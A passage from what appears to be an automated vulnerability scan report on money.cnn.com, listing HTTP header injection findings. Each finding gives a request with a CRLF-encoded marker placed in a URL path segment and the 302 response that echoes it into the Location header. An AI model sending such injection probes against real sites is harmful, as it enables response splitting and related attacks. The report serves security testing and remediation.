Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=78d3cb7f-dae9-42bd-ae1b-0298e52a5d1b3HX050; expires=Wed, 03-Aug-2011 08:43:34 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=10.2154&RES=128&WMPV=aea5e
ddd8221295a
; expires=Wed, 03-Aug-2011 08: 43:34 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 05 May 2011 12:43:33 GMT
Connection: close
Content-Length: 0


4.8. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/04/22/pf/airline_fees_rise/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload b97bc%0d%0ac8c08d61955 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/b97bc%0d%0ac8c08d61955/04/22/pf/airline_fees_rise/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:36 GMT
Server: Apache
Location: http://money.cnn.com/b97bc
c8c08d61955
/04/22/pf/airline_fees_rise/index.htm
Vary: Accept-Encoding
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/b97bc
c8c08d61955/04/22/p
...[SNIP]...

4.9. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/04/22/pf/airline_fees_rise/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 88309%0d%0ab79d19b4924 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/88309%0d%0ab79d19b4924/22/pf/airline_fees_rise/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:41 GMT
Server: Apache
Location: http://money.cnn.com/2011/88309
b79d19b4924
/22/pf/airline_fees_rise/index.htm
Vary: Accept-Encoding
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/88309
b79d19b4924/22
...[SNIP]...

4.10. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/04/22/pf/airline_fees_rise/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 78d87%0d%0a6fb9e0e3c55 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/04/78d87%0d%0a6fb9e0e3c55/pf/airline_fees_rise/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:43 GMT
Server: Apache
Location: http://money.cnn.com/2011/04/78d87
6fb9e0e3c55
/pf/airline_fees_rise/index.htm
Vary: Accept-Encoding
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/04/78d87
6fb9e0e3c55
...[SNIP]...

4.11. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/04/22/pf/airline_fees_rise/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 38578%0d%0adceb17e336b was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/04/22/38578%0d%0adceb17e336b/airline_fees_rise/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/04/22/38578
dceb17e336b
/airline_fees_rise/index.htm
Vary: Accept-Encoding
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/04/22/38578
dceb17e3
...[SNIP]...

4.12. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/04/22/pf/airline_fees_rise/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload c974d%0d%0adfb8820098c was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/04/22/pf/c974d%0d%0adfb8820098c/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/04/22/pf/c974d
dfb8820098c
/index.htm
Vary: Accept-Encoding
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/04/22/pf/c974d
dfb88
...[SNIP]...

4.13. http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/04/22/pf/airline_fees_rise/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload 90cb7%0d%0a576c6e118c8 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/04/22/pf/airline_fees_rise/90cb7%0d%0a576c6e118c8 HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/04/22/pf/airline_fees_rise/90cb7
576c6e118c8

Vary: Accept-Encoding
Content-Length: 318
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/04/22/pf/airline_fees
...[SNIP]...

4.14. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/02/pf/atm_fees_chase/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 8f75b%0d%0a0301f88c9c9 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/8f75b%0d%0a0301f88c9c9/05/02/pf/atm_fees_chase/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:35 GMT
Server: Apache
Location: http://money.cnn.com/8f75b
0301f88c9c9
/05/02/pf/atm_fees_chase/index.htm
Vary: Accept-Encoding
Content-Length: 320
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/8f75b
0301f88c9c9/05/02/p
...[SNIP]...

4.15. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/02/pf/atm_fees_chase/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload a21ea%0d%0ace8f08eda0a was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/a21ea%0d%0ace8f08eda0a/02/pf/atm_fees_chase/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:39 GMT
Server: Apache
Location: http://money.cnn.com/2011/a21ea
ce8f08eda0a
/02/pf/atm_fees_chase/index.htm
Vary: Accept-Encoding
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/a21ea
ce8f08eda0a/02
...[SNIP]...

4.16. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/02/pf/atm_fees_chase/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 3c9cf%0d%0a319eab080e was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/3c9cf%0d%0a319eab080e/pf/atm_fees_chase/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:40 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/3c9cf
319eab080e
/pf/atm_fees_chase/index.htm
Vary: Accept-Encoding
Content-Length: 321
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/3c9cf
319eab080e/
...[SNIP]...

4.17. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/02/pf/atm_fees_chase/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 44f36%0d%0a03edaf98efe was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/02/44f36%0d%0a03edaf98efe/atm_fees_chase/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:41 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/02/44f36
03edaf98efe
/atm_fees_chase/index.htm
Vary: Accept-Encoding
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/02/44f36
03edaf98
...[SNIP]...

4.18. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/02/pf/atm_fees_chase/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload 40f4e%0d%0a01397931e17 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/02/pf/40f4e%0d%0a01397931e17/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:43 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/02/pf/40f4e
01397931e17
/index.htm
Vary: Accept-Encoding
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/02/pf/40f4e
01397
...[SNIP]...

4.19. http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/02/pf/atm_fees_chase/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload a6e8c%0d%0a5795da73b5a was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/02/pf/atm_fees_chase/a6e8c%0d%0a5795da73b5a HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/02/pf/atm_fees_chase/a6e8c
5795da73b5a

Vary: Accept-Encoding
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/02/pf/atm_fees_cha
...[SNIP]...

4.20. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 9d058%0d%0a1bf56faaac5 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/9d058%0d%0a1bf56faaac5/05/02/real_estate/home-sale-strategies.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:42 GMT
Server: Apache
Location: http://money.cnn.com/9d058
1bf56faaac5
/05/02/real_estate/home-sale-strategies.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 344
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/9d058
1bf56faaac5/05/02/r
...[SNIP]...

4.21. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload ec1d9%0d%0a9b4a48b1ec3 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/ec1d9%0d%0a9b4a48b1ec3/02/real_estate/home-sale-strategies.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:43 GMT
Server: Apache
Location: http://money.cnn.com/2011/ec1d9
9b4a48b1ec3
/02/real_estate/home-sale-strategies.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 346
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/ec1d9
9b4a48b1ec3/02
...[SNIP]...

4.22. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 30187%0d%0ad728de29929 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/30187%0d%0ad728de29929/real_estate/home-sale-strategies.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/30187
d728de29929
/real_estate/home-sale-strategies.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 346
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/30187
d728de29929
...[SNIP]...

4.23. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload af131%0d%0a1082710a90d was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/02/af131%0d%0a1082710a90d/home-sale-strategies.moneymag/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/02/af131
1082710a90d
/home-sale-strategies.moneymag/index.htm
Vary: Accept-Encoding
Content-Length: 337
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/02/af131
1082710a
...[SNIP]...

4.24. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload 7fe5b%0d%0af797b3b6d6e was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/02/real_estate/7fe5b%0d%0af797b3b6d6e/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/02/real_estate/7fe5b
f797b3b6d6e
/index.htm
Vary: Accept-Encoding
Content-Length: 319
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/02/real_estate/7fe
...[SNIP]...

4.25. http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload 1e387%0d%0a1eb5ea7f25 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/1e387%0d%0a1eb5ea7f25 HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/02/real_estate/home-sale-strategies.moneymag/1e387
1eb5ea7f25

Vary: Accept-Encoding
Content-Length: 338
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/02/real_estate/hom
...[SNIP]...

4.26. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload f99ed%0d%0a85c2e16168 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /rssclick/f99ed%0d%0a85c2e16168/05/03/pf/credit_card_fraud_identity_theft/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:42 GMT
Server: Apache
Location: http://money.cnn.com/f99ed
85c2e16168
/05/03/pf/credit_card_fraud_identity_theft/index.htm
Vary: Accept-Encoding
Content-Length: 337
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/f99ed
85c2e16168/05/03/pf
...[SNIP]...

4.27. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 3deb8%0d%0a85daf08f43d was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/3deb8%0d%0a85daf08f43d/03/pf/credit_card_fraud_identity_theft/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:44 GMT
Server: Apache
Location: http://money.cnn.com/2011/3deb8
85daf08f43d
/03/pf/credit_card_fraud_identity_theft/index.htm
Vary: Accept-Encoding
Content-Length: 340
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/3deb8
85daf08f43d/03
...[SNIP]...

4.28. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 4ed98%0d%0a4018d3b4574 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/4ed98%0d%0a4018d3b4574/pf/credit_card_fraud_identity_theft/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/4ed98
4018d3b4574
/pf/credit_card_fraud_identity_theft/index.htm
Vary: Accept-Encoding
Content-Length: 340
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/4ed98
4018d3b4574
...[SNIP]...

4.29. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload d15ab%0d%0a85e45e0a9d3 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/d15ab%0d%0a85e45e0a9d3/credit_card_fraud_identity_theft/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:45 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/d15ab
85e45e0a9d3
/credit_card_fraud_identity_theft/index.htm
Vary: Accept-Encoding
Content-Length: 340
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/d15ab
85e45e0a
...[SNIP]...

4.30. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload ffef4%0d%0aa029c46ab0e was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/pf/ffef4%0d%0aa029c46ab0e/index.htm HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
Location: http://money.cnn.com/2011/05/03/pf/ffef4
a029c46ab0e
/index.htm
Vary: Accept-Encoding
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://money.cnn.com/2011/05/03/pf/ffef4
a029c
...[SNIP]...

4.31. http://money.cnn.com/rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://money.cnn.com
Path:   /rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/index.htm

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload c3f49%0d%0aac654ae67d3 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /rssclick/2011/05/03/pf/credit_card_fraud_identity_theft/c3f49%0d%0aac654ae67d3 HTTP/1.1
Host: money.cnn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:53:46 GMT
Server: Apache
